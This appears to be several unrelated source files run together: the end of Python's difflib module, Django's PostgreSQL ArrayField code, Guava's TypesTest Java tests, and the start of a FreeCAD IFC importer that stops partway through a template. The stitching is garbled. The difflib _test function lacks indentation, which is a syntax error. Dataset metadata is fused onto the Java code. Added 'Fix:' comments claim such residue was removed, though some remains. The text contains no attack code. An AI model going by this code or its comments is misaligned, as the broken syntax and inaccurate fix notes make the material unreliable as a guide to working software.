        # process change flags, generating middle column of next anchors/links
        next_id = [''] * len(flaglist)
        next_href = [''] * len(flaglist)
        num_chg, in_change = 0, False
        last = 0
        for i, flag in enumerate(flaglist):
            if flag:
                if not in_change:
                    in_change = True
                    last = i
                    # at the beginning of a change, drop an anchor a few lines
                    # (the context lines) before the change for the previous
                    # link
                    i = max([0, i - numlines])
                    next_id[i] = ' id="difflib_chg_%s_%d"' % (toprefix, num_chg)
                    # at the beginning of a change, drop a link to the next
                    # change
                    num_chg += 1
                    next_href[last] = '<a href="#difflib_chg_%s_%d">n</a>' % (
                        toprefix, num_chg)
            else:
                in_change = False
        # check for cases where there is no content to avoid exceptions
        if not flaglist:
            flaglist = [False]
            next_id = ['']
            next_href = ['']
            last = 0
            if context:
                # Fix: restore the &nbsp; entities lost to extraction garbling.
                fromlist = ['<td></td><td>&nbsp;No Differences Found&nbsp;</td>']
                tolist = fromlist
            else:
                fromlist = tolist = ['<td></td><td>&nbsp;Empty File&nbsp;</td>']
        # if not a change on first line, drop a link
        if not flaglist[0]:
            next_href[0] = '<a href="#difflib_chg_%s_0">f</a>' % toprefix
        # redo the last link to link to the top
        next_href[last] = '<a href="#difflib_chg_%s_top">t</a>' % (toprefix)

        return fromlist, tolist, flaglist, next_href, next_id

    def make_table(self, fromlines, tolines, fromdesc='', todesc='', context=False,
                   numlines=5):
        """Returns HTML table of side by side comparison with change highlights

        Arguments:
        fromlines -- list of "from" lines
        tolines -- list of "to" lines
        fromdesc -- "from" file column header string
        todesc -- "to" file column header string
        context -- set to True for contextual differences (defaults to False
            which shows full differences).
        numlines -- number of context lines.  When context is set True,
            controls number of lines displayed before and after the change.
            When context is False, controls the number of lines to place
            the "next" link anchors before the next change (so click of
            "next" link jumps to just before the change).
        """

        # make unique anchor prefixes so that multiple tables may exist
        # on the same page without conflict.
        self._make_prefix()

        # change tabs to spaces before it gets more difficult after we insert
        # markup
        fromlines, tolines = self._tab_newline_replace(fromlines, tolines)

        # create diffs iterator which generates side by side from/to data
        if context:
            context_lines = numlines
        else:
            context_lines = None
        diffs = _mdiff(fromlines, tolines, context_lines, linejunk=self._linejunk,
                       charjunk=self._charjunk)

        # set up iterator to wrap lines that exceed desired width
        if self._wrapcolumn:
            diffs = self._line_wrapper(diffs)

        # collect up from/to lines and flags into lists (also format the lines)
        fromlist, tolist, flaglist = self._collect_lines(diffs)

        # process change flags, generating middle column of next anchors/links
        fromlist, tolist, flaglist, next_href, next_id = self._convert_flags(
            fromlist, tolist, flaglist, context, numlines)

        s = []
        fmt = '    <tr><td class="diff_next"%s>%s</td>%s' + \
              '<td class="diff_next">%s</td>%s</tr>\n'
        for i in range(len(flaglist)):
            if flaglist[i] is None:
                # mdiff yields None on separator lines skip the bogus ones
                # generated for the first line
                if i > 0:
                    s.append('        </tbody>        \n        <tbody>\n')
            else:
                s.append(fmt % (next_id[i], next_href[i], fromlist[i],
                                next_href[i], tolist[i]))
        if fromdesc or todesc:
            header_row = '<thead><tr>%s%s%s%s</tr></thead>' % (
                '<th class="diff_next"><br /></th>',
                '<th colspan="2" class="diff_header">%s</th>' % fromdesc,
                '<th class="diff_next"><br /></th>',
                '<th colspan="2" class="diff_header">%s</th>' % todesc)
        else:
            header_row = ''

        table = self._table_template % dict(
            data_rows=''.join(s),
            header_row=header_row,
            prefix=self._prefix[1])

        # Replace the internal \0/\1 markers with real markup, and tabs
        # (stand-ins for expanded tab spaces) with &nbsp; so spacing survives
        # HTML rendering.  (Fix: the '\t' replacement had degenerated into a
        # plain space.)
        return table.replace('\0+', '<span class="diff_add">'). \
                     replace('\0-', '<span class="diff_sub">'). \
                     replace('\0^', '<span class="diff_chg">'). \
                     replace('\1', '</span>'). \
                     replace('\t', '&nbsp;')
# Remove the module-level ``re`` binding from difflib's public namespace now
# that the classes above have been built.  NOTE(review): assumes an earlier
# module-level ``import re`` (present in the file's head) — confirm.
del re
def restore(delta, which):
    r"""
    Generate one of the two sequences that generated a delta.

    Given a `delta` produced by `Differ.compare()` or `ndiff()`, extract
    lines originating from file 1 or 2 (parameter `which`), stripping off line
    prefixes.

    Examples:

    >>> diff = ndiff('one\ntwo\nthree\n'.splitlines(1),
    ...              'ore\ntree\nemu\n'.splitlines(1))
    >>> diff = list(diff)
    >>> print(''.join(restore(diff, 1)), end="")
    one
    two
    three
    >>> print(''.join(restore(diff, 2)), end="")
    ore
    tree
    emu
    """
    # Map the requested side to the two-character prefix ndiff uses for it.
    wanted = int(which)
    if wanted == 1:
        tag = "- "
    elif wanted == 2:
        tag = "+ "
    else:
        raise ValueError('unknown delta choice (must be 1 or 2): %r'
                         % which)
    # Keep common lines ("  ") plus the lines unique to the chosen side.
    keep = ("  ", tag)
    for line in delta:
        if line[:2] in keep:
            yield line[2:]
def _test():
import doctest, difflib
return doctest.testmod(difflib)
# Run the self-test when executed as a script.  (Fix: stripped the dataset
# metadata residue that had been fused onto the final line, which made the
# file a syntax error.)
if __name__ == "__main__":
    _test()
import json
from django.contrib.postgres import lookups
from django.contrib.postgres.forms import SimpleArrayField
from django.contrib.postgres.validators import ArrayMaxLengthValidator
from django.core import checks, exceptions
from django.db.models import Field, IntegerField, Transform
from django.db.models.lookups import Exact, In
from django.utils.translation import gettext_lazy as _
from ..utils import prefix_validation_error
from .utils import AttributeSetter
__all__ = ['ArrayField']
class ArrayField(Field):
    """PostgreSQL array column holding values of an arbitrary ``base_field``.

    Python-side values are lists (nested lists for multi-dimensional arrays).
    ``size``, when given, limits the number of elements via
    ArrayMaxLengthValidator.
    """
    empty_strings_allowed = False
    default_error_messages = {
        'item_invalid': _('Item %(nth)s in the array did not validate: '),
        'nested_array_mismatch': _('Nested arrays must have the same length.'),
    }

    def __init__(self, base_field, size=None, **kwargs):
        self.base_field = base_field
        self.size = size
        if self.size:
            # Copy the class-level validator list before appending so the
            # extra validator isn't shared across field instances.
            self.default_validators = self.default_validators[:]
            self.default_validators.append(ArrayMaxLengthValidator(self.size))
        # For performance, only add a from_db_value() method if the base field
        # implements it.
        if hasattr(self.base_field, 'from_db_value'):
            self.from_db_value = self._from_db_value
        super().__init__(**kwargs)

    @property
    def model(self):
        try:
            return self.__dict__['model']
        except KeyError:
            raise AttributeError("'%s' object has no attribute 'model'" % self.__class__.__name__)

    @model.setter
    def model(self, model):
        # Keep the base field's model in sync with the array field's.
        self.__dict__['model'] = model
        self.base_field.model = model

    def check(self, **kwargs):
        """System checks: reject related base fields, surface base-field errors."""
        errors = super().check(**kwargs)
        if self.base_field.remote_field:
            errors.append(
                checks.Error(
                    'Base field for array cannot be a related field.',
                    obj=self,
                    id='postgres.E002'
                )
            )
        else:
            # Remove the field name checks as they are not needed here.
            base_errors = self.base_field.check()
            if base_errors:
                messages = '\n    '.join('%s (%s)' % (error.msg, error.id) for error in base_errors)
                errors.append(
                    checks.Error(
                        'Base field for array has errors:\n    %s' % messages,
                        obj=self,
                        id='postgres.E001'
                    )
                )
        return errors

    def set_attributes_from_name(self, name):
        super().set_attributes_from_name(name)
        self.base_field.set_attributes_from_name(name)

    @property
    def description(self):
        return 'Array of %s' % self.base_field.description

    def db_type(self, connection):
        # e.g. "integer[]" or "integer[3]" when a size is set.
        size = self.size or ''
        return '%s[%s]' % (self.base_field.db_type(connection), size)

    def get_db_prep_value(self, value, connection, prepared=False):
        # Prepare each element through the base field; non-sequence values
        # pass through unchanged.  (Idiom: single isinstance with a tuple
        # instead of two chained isinstance calls.)
        if isinstance(value, (list, tuple)):
            return [self.base_field.get_db_prep_value(i, connection, prepared=False) for i in value]
        return value

    def deconstruct(self):
        """Migration serialization; normalize the import path and clone the base field."""
        name, path, args, kwargs = super().deconstruct()
        if path == 'django.contrib.postgres.fields.array.ArrayField':
            path = 'django.contrib.postgres.fields.ArrayField'
        kwargs.update({
            'base_field': self.base_field.clone(),
            'size': self.size,
        })
        return name, path, args, kwargs

    def to_python(self, value):
        if isinstance(value, str):
            # Assume we're deserializing
            vals = json.loads(value)
            value = [self.base_field.to_python(val) for val in vals]
        return value

    def _from_db_value(self, value, expression, connection, context):
        # Installed as from_db_value in __init__ only when the base field
        # defines from_db_value itself.
        if value is None:
            return value
        return [
            self.base_field.from_db_value(item, expression, connection, context)
            for item in value
        ]

    def value_to_string(self, obj):
        """Serialize the list as JSON, delegating element formatting to the base field."""
        values = []
        vals = self.value_from_object(obj)
        base_field = self.base_field
        for val in vals:
            if val is None:
                values.append(None)
            else:
                # Wrap the raw value so base_field.value_to_string() can read
                # it through its attname.
                obj = AttributeSetter(base_field.attname, val)
                values.append(base_field.value_to_string(obj))
        return json.dumps(values)

    def get_transform(self, name):
        """Resolve ``field__N`` index lookups and ``field__N_M`` slice lookups."""
        transform = super().get_transform(name)
        if transform:
            return transform
        if '_' not in name:
            try:
                index = int(name)
            except ValueError:
                pass
            else:
                index += 1  # postgres uses 1-indexing
                return IndexTransformFactory(index, self.base_field)
        try:
            start, end = name.split('_')
            start = int(start) + 1
            end = int(end)  # don't add one here because postgres slices are weird
        except ValueError:
            pass
        else:
            return SliceTransformFactory(start, end)

    def validate(self, value, model_instance):
        """Validate each element; nested arrays must be rectangular."""
        super().validate(value, model_instance)
        for index, part in enumerate(value):
            try:
                self.base_field.validate(part, model_instance)
            except exceptions.ValidationError as error:
                raise prefix_validation_error(
                    error,
                    prefix=self.error_messages['item_invalid'],
                    code='item_invalid',
                    params={'nth': index},
                )
        if isinstance(self.base_field, ArrayField):
            if len({len(i) for i in value}) > 1:
                raise exceptions.ValidationError(
                    self.error_messages['nested_array_mismatch'],
                    code='nested_array_mismatch',
                )

    def run_validators(self, value):
        super().run_validators(value)
        for index, part in enumerate(value):
            try:
                self.base_field.run_validators(part)
            except exceptions.ValidationError as error:
                raise prefix_validation_error(
                    error,
                    prefix=self.error_messages['item_invalid'],
                    code='item_invalid',
                    params={'nth': index},
                )

    def formfield(self, **kwargs):
        defaults = {
            'form_class': SimpleArrayField,
            'base_field': self.base_field.formfield(),
            'max_length': self.size,
        }
        defaults.update(kwargs)
        return super().formfield(**defaults)
@ArrayField.register_lookup
class ArrayContains(lookups.DataContains):
    """``__contains`` lookup with the SQL cast to the column's array type."""

    def as_sql(self, qn, connection):
        base_sql, base_params = super().as_sql(qn, connection)
        cast_type = self.lhs.output_field.db_type(connection)
        return '{}::{}'.format(base_sql, cast_type), base_params
@ArrayField.register_lookup
class ArrayContainedBy(lookups.ContainedBy):
    """``__contained_by`` lookup with the SQL cast to the column's array type."""

    def as_sql(self, qn, connection):
        base_sql, base_params = super().as_sql(qn, connection)
        cast_type = self.lhs.output_field.db_type(connection)
        return '{}::{}'.format(base_sql, cast_type), base_params
@ArrayField.register_lookup
class ArrayExact(Exact):
    """``__exact`` lookup with the SQL cast to the column's array type."""

    def as_sql(self, qn, connection):
        base_sql, base_params = super().as_sql(qn, connection)
        cast_type = self.lhs.output_field.db_type(connection)
        return '{}::{}'.format(base_sql, cast_type), base_params
@ArrayField.register_lookup
class ArrayOverlap(lookups.Overlap):
    """``__overlap`` lookup with the SQL cast to the column's array type."""

    def as_sql(self, qn, connection):
        base_sql, base_params = super().as_sql(qn, connection)
        cast_type = self.lhs.output_field.db_type(connection)
        return '{}::{}'.format(base_sql, cast_type), base_params
@ArrayField.register_lookup
class ArrayLenTransform(Transform):
    """``__len`` transform: number of elements in the array (0 for empty)."""
    lookup_name = 'len'
    output_field = IntegerField()

    def as_sql(self, compiler, connection):
        compiled_lhs, lhs_params = compiler.compile(self.lhs)
        # Distinguish NULL and empty arrays
        template = (
            'CASE WHEN %(lhs)s IS NULL THEN NULL ELSE '
            'coalesce(array_length(%(lhs)s, 1), 0) END'
        )
        return template % {'lhs': compiled_lhs}, lhs_params
@ArrayField.register_lookup
class ArrayInLookup(In):
    """``__in`` lookup accepting lists by converting them to hashable tuples."""

    def get_prep_lookup(self):
        values = super().get_prep_lookup()
        # In.process_rhs() expects values to be hashable, so convert lists
        # to tuples; expressions pass through untouched.
        return [
            value if hasattr(value, 'resolve_expression') else tuple(value)
            for value in values
        ]
class IndexTransform(Transform):
    """Transform selecting one (1-indexed) element of an array column."""

    def __init__(self, index, base_field, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.index = index
        self.base_field = base_field

    def as_sql(self, compiler, connection):
        compiled_lhs, params = compiler.compile(self.lhs)
        return '{}[{}]'.format(compiled_lhs, self.index), params

    @property
    def output_field(self):
        # A single element has the type of the array's base field.
        return self.base_field
class IndexTransformFactory:
    """Callable that builds an IndexTransform for a fixed index/base field."""

    def __init__(self, index, base_field):
        self.index = index
        self.base_field = base_field

    def __call__(self, *args, **kwargs):
        transform = IndexTransform(self.index, self.base_field, *args, **kwargs)
        return transform
class SliceTransform(Transform):
    """Transform selecting a PostgreSQL array slice ``lhs[start:end]``."""

    def __init__(self, start, end, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.start = start
        self.end = end

    def as_sql(self, compiler, connection):
        compiled_lhs, params = compiler.compile(self.lhs)
        return '{}[{}:{}]'.format(compiled_lhs, self.start, self.end), params
class SliceTransformFactory:
    """Callable that builds a SliceTransform for a fixed start/end pair.

    (Fix: removed the dataset-metadata residue that had been fused onto the
    final line, which made the file a syntax error.)
    """

    def __init__(self, start, end):
        self.start = start
        self.end = end

    def __call__(self, *args, **kwargs):
        return SliceTransform(self.start, self.end, *args, **kwargs)
/*
* Copyright (C) 2011 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.reflect;
import static com.google.common.truth.Truth.assertThat;
import static java.util.Arrays.asList;
import static org.junit.Assert.assertThrows;
import com.google.common.collect.Lists;
import com.google.common.testing.EqualsTester;
import com.google.common.testing.NullPointerTester;
import com.google.common.testing.NullPointerTester.Visibility;
import com.google.common.testing.SerializableTester;
import com.google.errorprone.annotations.CanIgnoreReturnValue;
import java.lang.reflect.GenericArrayType;
import java.lang.reflect.GenericDeclaration;
import java.lang.reflect.ParameterizedType;
import java.lang.reflect.Type;
import java.lang.reflect.TypeVariable;
import java.lang.reflect.WildcardType;
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Map.Entry;
import junit.framework.TestCase;
import org.jspecify.annotations.NullUnmarked;
/**
* Tests for {@link Types}.
*
* @author Ben Yu
*/
@AndroidIncompatible // lots of failures, possibly some related to bad equals() implementations?
@NullUnmarked
public class TypesTest extends TestCase {
public void testNewParameterizedType_ownerTypeImplied() throws Exception {
  // JVM-produced type for Map.Entry<String, Integer>, captured via TypeCapture.
  ParameterizedType expected =
      (ParameterizedType) new TypeCapture<Entry<String, Integer>>() {}.capture();
  // Types.newParameterizedType should infer Map as Entry's owner type.
  ParameterizedType actual =
      Types.newParameterizedType(Entry.class, String.class, Integer.class);
  assertEquals(expected, actual);
  assertEquals(Map.class, actual.getOwnerType());
}
public void testNewParameterizedType() {
ParameterizedType jvmType =
(ParameterizedType) new TypeCapture<HashMap<String, int[][]>>() {}.capture();
ParameterizedType ourType =
Types.newParameterizedType(HashMap.class, String.class, int[][].class);
new EqualsTester().addEqualityGroup(jvmType, ourType).testEquals();
assertEquals(jvmType.toString(), ourType.toString());
assertEquals(jvmType.hashCode(), ourType.hashCode());
assertEquals(HashMap.class, ourType.getRawType());
assertThat(ourType.getActualTypeArguments())
.asList()
.containsExactlyElementsIn(asList(jvmType.getActualTypeArguments()))
.inOrder();
assertEquals(
Arrays.asList(String.class, Types.newArrayType(Types.newArrayType(int.class))),
Arrays.asList(ourType.getActualTypeArguments()));
assertEquals(null, ourType.getOwnerType());
}
public void testNewParameterizedType_nonStaticLocalClass() {
class LocalClass<T> {}
Type jvmType = new LocalClass<String>() {}.getClass().getGenericSuperclass();
Type ourType = Types.newParameterizedType(LocalClass.class, String.class);
assertEquals(jvmType, ourType);
}
public void testNewParameterizedType_staticLocalClass() {
doTestNewParameterizedTypeStaticLocalClass();
}
private static void doTestNewParameterizedTypeStaticLocalClass() {
class LocalClass<T> {}
Type jvmType = new LocalClass<String>() {}.getClass().getGenericSuperclass();
Type ourType = Types.newParameterizedType(LocalClass.class, String.class);
assertEquals(jvmType, ourType);
}
public void testNewParameterizedTypeWithOwner() {
ParameterizedType jvmType =
(ParameterizedType) new TypeCapture<Entry<String, int[][]>>() {}.capture();
ParameterizedType ourType =
Types.newParameterizedTypeWithOwner(Map.class, Entry.class, String.class, int[][].class);
new EqualsTester()
.addEqualityGroup(jvmType, ourType)
.addEqualityGroup(new TypeCapture<Entry<String, String>>() {}.capture())
.addEqualityGroup(new TypeCapture<Map<String, Integer>>() {}.capture())
.testEquals();
assertEquals(jvmType.toString(), ourType.toString());
assertEquals(Map.class, ourType.getOwnerType());
assertEquals(Entry.class, ourType.getRawType());
assertThat(ourType.getActualTypeArguments())
.asList()
.containsExactlyElementsIn(asList(jvmType.getActualTypeArguments()))
.inOrder();
}
public void testNewParameterizedType_serializable() {
SerializableTester.reserializeAndAssert(
Types.newParameterizedType(Entry.class, String.class, Integer.class));
}
public void testNewParameterizedType_ownerMismatch() {
assertThrows(
IllegalArgumentException.class,
() -> Types.newParameterizedTypeWithOwner(Number.class, List.class, String.class));
}
public void testNewParameterizedType_ownerMissing() {
assertEquals(
Types.newParameterizedType(Entry.class, String.class, Integer.class),
Types.newParameterizedTypeWithOwner(null, Entry.class, String.class, Integer.class));
}
public void testNewParameterizedType_invalidTypeParameters() {
assertThrows(
IllegalArgumentException.class,
() -> Types.newParameterizedTypeWithOwner(Map.class, Entry.class, String.class));
}
public void testNewParameterizedType_primitiveTypeParameters() {
assertThrows(
IllegalArgumentException.class,
() -> Types.newParameterizedTypeWithOwner(Map.class, Entry.class, int.class, int.class));
}
public void testNewArrayType() {
Type jvmType1 = new TypeCapture<List<String>[]>() {}.capture();
GenericArrayType ourType1 =
(GenericArrayType) Types.newArrayType(Types.newParameterizedType(List.class, String.class));
@SuppressWarnings("rawtypes") // test of raw types
Type jvmType2 = new TypeCapture<List[]>() {}.capture();
Type ourType2 = Types.newArrayType(List.class);
new EqualsTester()
.addEqualityGroup(jvmType1, ourType1)
.addEqualityGroup(jvmType2, ourType2)
.testEquals();
assertEquals(new TypeCapture<List<String>>() {}.capture(), ourType1.getGenericComponentType());
assertEquals(jvmType1.toString(), ourType1.toString());
assertEquals(jvmType2.toString(), ourType2.toString());
}
public void testNewArrayTypeOfArray() {
Type jvmType = new TypeCapture<int[][]>() {}.capture();
Type ourType = Types.newArrayType(int[].class);
assertEquals(jvmType.toString(), ourType.toString());
new EqualsTester().addEqualityGroup(jvmType, ourType).testEquals();
}
public void testNewArrayType_primitive() {
Type jvmType = new TypeCapture<int[]>() {}.capture();
Type ourType = Types.newArrayType(int.class);
assertEquals(jvmType.toString(), ourType.toString());
new EqualsTester().addEqualityGroup(jvmType, ourType).testEquals();
}
public void testNewArrayType_upperBoundedWildcard() {
Type wildcard = Types.subtypeOf(Number.class);
assertEquals(Types.subtypeOf(Number[].class), Types.newArrayType(wildcard));
}
public void testNewArrayType_lowerBoundedWildcard() {
Type wildcard = Types.supertypeOf(Number.class);
assertEquals(Types.supertypeOf(Number[].class), Types.newArrayType(wildcard));
}
public void testNewArrayType_serializable() {
SerializableTester.reserializeAndAssert(Types.newArrayType(int[].class));
}
private static class WithWildcardType {
@SuppressWarnings("unused")
void withoutBound(List<?> list) {}
@SuppressWarnings("unused")
void withObjectBound(List<? extends Object> list) {}
@SuppressWarnings("unused")
void withUpperBound(List<? extends int[][]> list) {}
@SuppressWarnings("unused")
void withLowerBound(List<? super String[][]> list) {}
static WildcardType getWildcardType(String methodName) throws Exception {
ParameterizedType parameterType =
(ParameterizedType)
WithWildcardType.class.getDeclaredMethod(methodName, List.class)
.getGenericParameterTypes()[0];
return (WildcardType) parameterType.getActualTypeArguments()[0];
}
}
public void testNewWildcardType() throws Exception {
WildcardType noBoundJvmType = WithWildcardType.getWildcardType("withoutBound");
WildcardType objectBoundJvmType = WithWildcardType.getWildcardType("withObjectBound");
WildcardType upperBoundJvmType = WithWildcardType.getWildcardType("withUpperBound");
WildcardType lowerBoundJvmType = WithWildcardType.getWildcardType("withLowerBound");
WildcardType objectBound = Types.subtypeOf(Object.class);
WildcardType upperBound = Types.subtypeOf(int[][].class);
WildcardType lowerBound = Types.supertypeOf(String[][].class);
assertEqualWildcardType(noBoundJvmType, objectBound);
assertEqualWildcardType(objectBoundJvmType, objectBound);
assertEqualWildcardType(upperBoundJvmType, upperBound);
assertEqualWildcardType(lowerBoundJvmType, lowerBound);
new EqualsTester()
.addEqualityGroup(noBoundJvmType, objectBoundJvmType, objectBound)
.addEqualityGroup(upperBoundJvmType, upperBound)
.addEqualityGroup(lowerBoundJvmType, lowerBound)
.testEquals();
}
public void testNewWildcardType_primitiveTypeBound() {
assertThrows(IllegalArgumentException.class, () -> Types.subtypeOf(int.class));
}
public void testNewWildcardType_serializable() {
SerializableTester.reserializeAndAssert(Types.supertypeOf(String.class));
SerializableTester.reserializeAndAssert(Types.subtypeOf(String.class));
SerializableTester.reserializeAndAssert(Types.subtypeOf(Object.class));
}
private static void assertEqualWildcardType(WildcardType expected, WildcardType actual) {
assertEquals(expected.toString(), actual.toString());
assertEquals(actual.toString(), expected.hashCode(), actual.hashCode());
assertThat(actual.getLowerBounds())
.asList()
.containsExactlyElementsIn(asList(expected.getLowerBounds()))
.inOrder();
assertThat(actual.getUpperBounds())
.asList()
.containsExactlyElementsIn(asList(expected.getUpperBounds()))
.inOrder();
}
private static class WithTypeVariable {
@SuppressWarnings("unused")
<T> void withoutBound(List<T> list) {}
@SuppressWarnings({
"unused",
/*
* Since reflection can't tell the difference between <T> and <T extends Object>, it doesn't
* make a ton of sense to have a separate tests for each. But having tests for each doesn't
* really hurt anything, and maybe it will serve a purpose in a future in which Java has a
* built-in nullness feature?
*/
"ExtendsObject",
})
<T extends Object> void withObjectBound(List<T> list) {}
@SuppressWarnings("unused")
<T extends Number & CharSequence> void withUpperBound(List<T> list) {}
static TypeVariable<?> getTypeVariable(String methodName) throws Exception {
ParameterizedType parameterType =
(ParameterizedType)
WithTypeVariable.class.getDeclaredMethod(methodName, List.class)
.getGenericParameterTypes()[0];
return (TypeVariable<?>) parameterType.getActualTypeArguments()[0];
}
}
public void testNewTypeVariable() throws Exception {
TypeVariable<?> noBoundJvmType = WithTypeVariable.getTypeVariable("withoutBound");
TypeVariable<?> objectBoundJvmType = WithTypeVariable.getTypeVariable("withObjectBound");
TypeVariable<?> upperBoundJvmType = WithTypeVariable.getTypeVariable("withUpperBound");
TypeVariable<?> noBound = withBounds(noBoundJvmType);
TypeVariable<?> objectBound = withBounds(objectBoundJvmType, Object.class);
TypeVariable<?> upperBound = withBounds(upperBoundJvmType, Number.class, CharSequence.class);
assertEqualTypeVariable(noBoundJvmType, noBound);
assertEqualTypeVariable(noBoundJvmType, withBounds(noBoundJvmType, Object.class));
assertEqualTypeVariable(objectBoundJvmType, objectBound);
assertEqualTypeVariable(upperBoundJvmType, upperBound);
new TypeVariableEqualsTester()
.addEqualityGroup(noBoundJvmType, noBound)
.addEqualityGroup(objectBoundJvmType, objectBound)
.addEqualityGroup(upperBoundJvmType, upperBound)
.testEquals();
}
public void testNewTypeVariable_primitiveTypeBound() {
assertThrows(
IllegalArgumentException.class,
() -> Types.newArtificialTypeVariable(List.class, "E", int.class));
}
public void testNewTypeVariable_serializable() throws Exception {
assertThrows(
RuntimeException.class,
() -> SerializableTester.reserialize(Types.newArtificialTypeVariable(List.class, "E")));
}
private static <D extends GenericDeclaration> TypeVariable<D> withBounds(
TypeVariable<D> typeVariable, Type... bounds) {
return Types.newArtificialTypeVariable(
typeVariable.getGenericDeclaration(), typeVariable.getName(), bounds);
}
private static class TypeVariableEqualsTester {
private final EqualsTester tester = new EqualsTester();
@CanIgnoreReturnValue
TypeVariableEqualsTester addEqualityGroup(Type jvmType, Type... types) {
if (Types.NativeTypeVariableEquals.NATIVE_TYPE_VARIABLE_ONLY) {
tester.addEqualityGroup(jvmType);
tester.addEqualityGroup((Object[]) types);
} else {
tester.addEqualityGroup(Lists.asList(jvmType, types).toArray());
}
return this;
}
void testEquals() {
tester.testEquals();
}
}
private static void assertEqualTypeVariable(TypeVariable<?> expected, TypeVariable<?> actual) {
assertEquals(expected.toString(), actual.toString());
assertEquals(expected.getName(), actual.getName());
assertEquals(expected.getGenericDeclaration(), actual.getGenericDeclaration());
if (!Types.NativeTypeVariableEquals.NATIVE_TYPE_VARIABLE_ONLY) {
assertEquals(actual.toString(), expected.hashCode(), actual.hashCode());
}
assertThat(actual.getBounds())
.asList()
.containsExactlyElementsIn(asList(expected.getBounds()))
.inOrder();
}
/**
* Working with arrays requires defensive code. Verify that we clone the type array for both input
* and output.
*/
public void testNewParameterizedTypeImmutability() {
Type[] typesIn = {String.class, Integer.class};
ParameterizedType parameterizedType = Types.newParameterizedType(Map.class, typesIn);
typesIn[0] = null;
typesIn[1] = null;
Type[] typesOut = parameterizedType.getActualTypeArguments();
typesOut[0] = null;
typesOut[1] = null;
assertEquals(String.class, parameterizedType.getActualTypeArguments()[0]);
assertEquals(Integer.class, parameterizedType.getActualTypeArguments()[1]);
}
public void testNewParameterizedTypeWithWrongNumberOfTypeArguments() {
assertThrows(
IllegalArgumentException.class,
() -> Types.newParameterizedType(Map.class, String.class, Integer.class, Long.class));
}
public void testToString() {
assertEquals(int[].class.getName(), Types.toString(int[].class));
assertEquals(int[][].class.getName(), Types.toString(int[][].class));
assertEquals(String[].class.getName(), Types.toString(String[].class));
Type elementType = List.class.getTypeParameters()[0];
assertEquals(elementType.toString(), Types.toString(elementType));
}
public void testNullPointers() {
new NullPointerTester().testStaticMethods(Types.class, Visibility.PACKAGE);
}
} | java | github | https://github.com/google/guava | android/guava-tests/test/com/google/common/reflect/TypesTest.java |
#***************************************************************************
#* *
#* Copyright (c) 2014 *
#* Yorik van Havre <yorik@uncreated.net> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
__title__= "FreeCAD IFC importer - Enhanced ifcopenshell-only version"
__author__ = "Yorik van Havre"
__url__ = "http://www.freecadweb.org"
import os,time,tempfile,uuid,FreeCAD,Part,Draft,Arch,math,DraftVecUtils
# Keep a handle on the builtin open() before this module's own open()
# (defined further down) shadows it; pyopen is used later to write files.
if open.__module__ == '__builtin__':
    pyopen = open # because we'll redefine open below
# which IFC type must create which FreeCAD type
# Maps each FreeCAD Arch object type (the suffix of an Arch.makeXxx factory)
# to the list of IFC entity classes it should be created from.
typesmap = { "Site": ["IfcSite"],
             "Building": ["IfcBuilding"],
             "Floor": ["IfcBuildingStorey"],
             "Structure": ["IfcBeam", "IfcBeamStandardCase", "IfcColumn", "IfcColumnStandardCase", "IfcSlab", "IfcFooting", "IfcPile", "IfcTendon"],
             "Wall": ["IfcWall", "IfcWallStandardCase", "IfcCurtainWall"],
             "Window": ["IfcWindow", "IfcWindowStandardCase", "IfcDoor", "IfcDoorStandardCase"],
             "Roof": ["IfcRoof"],
             "Stairs": ["IfcStair", "IfcStairFlight", "IfcRamp", "IfcRampFlight"],
             "Space": ["IfcSpace"],
             "Rebar": ["IfcReinforcingBar"],
             "Equipment": ["IfcFurnishingElement","IfcSanitaryTerminal","IfcFlowTerminal","IfcElectricAppliance"]
           }
# specific name translations
# FreeCAD role name -> IFC entity suffix, for roles whose names differ between
# the two vocabularies (used in reverse when importing, see insert()).
translationtable = { "Foundation":"Footing",
                     "Floor":"BuildingStorey",
                     "Rebar":"ReinforcingBar",
                     "HydroEquipment":"SanitaryTerminal",
                     "ElectricEquipment":"ElectricAppliance",
                     "Furniture":"FurnishingElement",
                     "Stair Flight":"StairFlight",
                     "Curtain Wall":"CurtainWall"
                   }
# Minimal IFC2X3 file skeleton used when exporting; the $placeholders are
# substituted in export(). Runtime content: do not edit the entity lines.
ifctemplate = """ISO-10303-21;
HEADER;
FILE_DESCRIPTION(('ViewDefinition [CoordinationView]'),'2;1');
FILE_NAME('$filename','$timestamp',('$owner','$email'),('$company'),'IfcOpenShell','IfcOpenShell','');
FILE_SCHEMA(('IFC2X3'));
ENDSEC;
DATA;
#1=IFCPERSON($,$,'$owner',$,$,$,$,$);
#2=IFCORGANIZATION($,'$company',$,$,$);
#3=IFCPERSONANDORGANIZATION(#1,#2,$);
#4=IFCAPPLICATION(#2,'$version','FreeCAD','118df2cf_ed21_438e_a41');
#5=IFCOWNERHISTORY(#3,#4,$,.ADDED.,$,#3,#4,$now);
#6=IFCDIRECTION((1.,0.,0.));
#7=IFCDIRECTION((0.,0.,1.));
#8=IFCCARTESIANPOINT((0.,0.,0.));
#9=IFCAXIS2PLACEMENT3D(#8,#7,#6);
#10=IFCDIRECTION((0.,1.,0.));
#11=IFCGEOMETRICREPRESENTATIONCONTEXT('Plan','Model',3,1.E-05,#9,#10);
#12=IFCDIMENSIONALEXPONENTS(0,0,0,0,0,0,0);
